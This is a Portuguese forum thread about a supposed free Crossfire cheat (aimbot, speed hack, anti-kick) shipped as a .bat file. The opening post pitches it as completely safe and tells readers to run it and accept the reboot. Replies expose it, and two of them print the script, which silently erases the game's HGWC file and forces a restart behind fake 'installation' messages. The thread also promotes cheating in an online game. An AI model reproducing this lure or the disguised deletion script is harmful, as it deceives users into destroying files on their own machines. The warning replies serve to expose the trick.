Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.

Speed hacker + anti kick em português, 100% Free 100% funfando!.


Posts Recomendados

LEIAM TUDO PARA NÃO FICAR DÚVIDAS!!!!!!!!!!!

Olá a todos, vim mostrar o meu novo hacker. Ele é .bat mais não vão ser noob e pensar que é hacker e essas outras coisas como os noob pensaram hoje. O arquivo .bat é só para ativar alguns arquivos na pasta z8games para não ser kickado do servidor.

Esse hacker é contem:

-Auto mira 100%

-Anti-kick 100%

-Anti-error 50%

-Speed hacker 100%

-100$ Free.

Vídeo de eu usando esse hacker:

[video=youtube;20Gz0TGXaYk]

É necessário se cadastrar para acessar o conteúdo.

 

 

Como utilizar:

1° Baixe.

2° Extraia a o arquivo.

3° Abra o arquivo.

4° Clique em iniciar hacker.

5° Seu pc irá reiniciar (Essa parte que os noob pensaram que era zuera)

6° Depois que seu PC reiniciar basta você entrar no Crossfire que o Hacker irá funcionar.

COMO PARAR O HACKER?

Simplesmente abra a pasta do hacker e abra a pasta de texto, dai nessa pasta terá algumas instruções e um pequeno código disponivel, copie esse código e volte para a pasta do hacker e clique com o botão direito em cima do 'iniciar hacker' e depois em editar, dai apague tudo o que tiver lá dentro e cole o texto que você copiou e salva, dai é só você abrir a pasta de novo e dai clicar em inciar hacker, dai irá carregar e o seu pc irá reiniciar automaticamente e pronto, o hacker estará fora do seu pc e do Crossfire.

Ele é um cheat bem simples e util, e também é bem leve e não precisa instala. Ele é 100% Seguro e é bem simples mesmo, eu fiz ele rápidinho e ele foi feito pelo bloco de notas, mais é simples, mais bem util e legal, estou muito feliz por ter feito ele.

 

Para não ficar dúvidas irei falar mais sobre esse hacker.

-Ao iniciar ele, ele move para outro local um arquivo da pasta da z8games, assim fazendo o vote kick sempre ao ser iniciado colocar automaticamente 16 pontos em f12.

-Outra parte é que meche com o mause com computador, ele sempre ao ser clicado avança na cabeça dos personagens do jogo, assim dando head shot.

-Ele também altera um arquivo da pasta da Z8games fazendo você correr rápido.

Esse Hacker também tem uma pasta invisivel dentro da que vocês irão baixar, pelo o amor de Deus, não excluam ela, se não caso vocês queiram tirar o hacker dai tem a copia dos arquivos que foram modificados para serem recolocados e fazer o Crossfire voltar ao normal.

Como eu disse é muito simples mesmo e foi feito na mão, com o bloco de notas e eu não vou falar mais para a concorrência não plagiar minha ideia :)

Caso vocês não consigam e caso não dê certo posta aí pra mim te ajudar, é bom saber se tiver algum erro para mim modificar rápidinho antes que alguém baixe.

 

É isso aí galera, espero que gostem!, boa noite!

Link para o comentário
Compartilhar em outros sites

hackershowdebola Escreveu:

Eu não acho hacker lixo, eu só não gosto quando eles usam. Tipo eu jogo Crossfire para se divertir e é tão legal, uma maravilha de jogo, só que os hacker ficam estragando o jogo :´(

Eu jogo a 3 anos e nunca baixei e nem usei hacker nem um. Eu só quero diminuir o número de hacker e aos hacker que já lerão minhas intenções com esse programinha que eu fiz, por favor não avise aos outros, menos concorrencia para vocês e menos hacker para me atrapalhar

Eu não sei o que dizer, mais se vocês querem usar hacker por mim tudo beleza, mais eu tento fazer algo para conter isso.

Agora seremos forçados a jogar com poucos brasileiros porque 2 em 10 brasileiros usarão hacker.

Isso é decepsionante.

E se fala membro com m não com n como você disse o hahahaha ou algo assim.

 

NÃO BAIXE ISSO VAI DESLIGA SEU COMPUTADOR E BLOQUIAR O CROSSFIRE COMO ELE DISSE(NÃO SEI SE E VERDADE)

Link para o comentário
Compartilhar em outros sites

Cara desiste ninguem vai cair mais na sua e nesse tópico vc foi ainda mais nooob pq já começou falando do .bat se vc nao falasse pelo menos algum idiot poderia baixar mais vc é um inutil

:fuck::fuck::fuck::fuck::fuck::fuck::fuck::fuck::fuck::fuck:

Link para o comentário
Compartilhar em outros sites

Pelo o amor de Deus, largue de ser noob, se vocês não acreditam em mim apenas baixe e clique em editar antes de abrir para vocês querem que são só comandos do hacker, eu ainda disse como eu fiz e disse como funciona, qual quer um pode clicar e ver como ele é formado e ver que não tem nada de mais. Parem de ser noob, se você não acredita simplesmente não baixe e também não responda os meus tópicos, você nem sabe e fica me xingando, fica postando só para fazer volume nas suas postagens!. Como eu faço pra bloquear esse cara pra ele não postar mais nos meus tópicos?

Link para o comentário
Compartilhar em outros sites

Reclamação: hackershowdebola não querendo te onfender mais pare de ser noob, pois vc está fazendo isso a troco de quer :chingando: com o pc dos membros :raiva:

 

Aviso: Não baixem todo hacker que vcs vêêm pela frente pois isso pode complica muita na vida do seu PC é sempre baixar aqueles confiavés que tem Scan e também é bom saber um pouco sobre virus

 

Por mim:Eu nem baixeiii pois acreditei nos coméntarios do hahahuhulol

 

postpunido.png

Link para o comentário
Compartilhar em outros sites

  • 1 mês depois...

essa arma primeiramente nao existo no crossfire da z8games

segundo tem ai uma funcionalidade nao referida acima por ser montagem

ai ele nao usa o tail aimbot que aponta directo para a cabeça

eu aconselho a nao baixarem por nao ser fiavel

closed por favor

Link para o comentário
Compartilhar em outros sites

olha so eu baixei e fui dar uma olhada nos comandos e n gostei muinto n num tem nada de mais eli so ta zuando mesmo olha os comandos aki...

cd..

cd..

cd..

cd..

cd arquivos de programas

cd Z8Games

cd CrossFire

ERASE cd HGWC /q /s

MSG * Pronto o hacker está instalado. Clique em 'OK' para ir para a próxima faze da instalação.

shutdown -r -c "Seu pc irá reiniciar para completar a instalação, quando ligar o pc novamente o hacker já estará instalado." -t 20

Link para o comentário
Compartilhar em outros sites

aew gente nem vo arriscar a baixar pq este video olha eu ja vejo ele a 2 anos

 

bloko de notas gente e so criacao de virus e o pior que existe nuubs fazendo isso pq ele nao aprende a cria um cavalo de troia, apagar programa operacional, vai dea de ser nuub e tentar renligar o pc dos otros

Link para o comentário
Compartilhar em outros sites

eu testei o hack só q num funfo .-. mais só reinicior não queimo pc nenhum, ainda sim acho q não foi serto o ban no cara pq ele tentou ajudar, e não é virus nem nada

sómente um bando de nb q não baixou o conteudo, não testou e ainda por sima fica falando mal doque o cara postou sem se quer al menos ter provas que akilo ia foder o pc do user ¬¬' gente pf vai ser nb pra la!! o cara tentou ajudar, e vcs ficam falando zuera do post do cara. affz VÃO SER NB PRA LA VC S Q DEVERIAM SER BANIDOS!!!!!

Link para o comentário
Compartilhar em outros sites

  • 3 semanas atrás...

Simplesmente ele desliga seu pc e ainda deleta o HGWC.exe da sua pasta do crossfire recomendo não baixarem pois eu ja baixei e editei esse vídeo ele pegou do youtube e modificou pois antes eu ja tinha visto e ainda de tudo esse video tambem e velho recomendo nao baixarem obedeça e agradeça

 

 

cd..

cd..

cd..

cd..

cd arquivos de programas

cd Z8Games

cd CrossFire

ERASE cd HGWC.exe /q /s

MSG * Pronto o hacker está instalado. Clique em 'OK' para ir para a próxima faze da instalação.

shutdown -r -c "Seu pc irá reiniciar para completar a instalação" -t 20

 

 

 

 

 

 

 

traduzindo Fake Closed Aqui

 

 

Assistam:

 

 

 

Agradeça Se Ajudei Não cai o Teu Dedo e Nem Custa ZP Sou Novato Mas Tentando Evoluir

Link para o comentário
Compartilhar em outros sites

Este tópico está impedido de receber novos posts.
 Compartilhar

×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.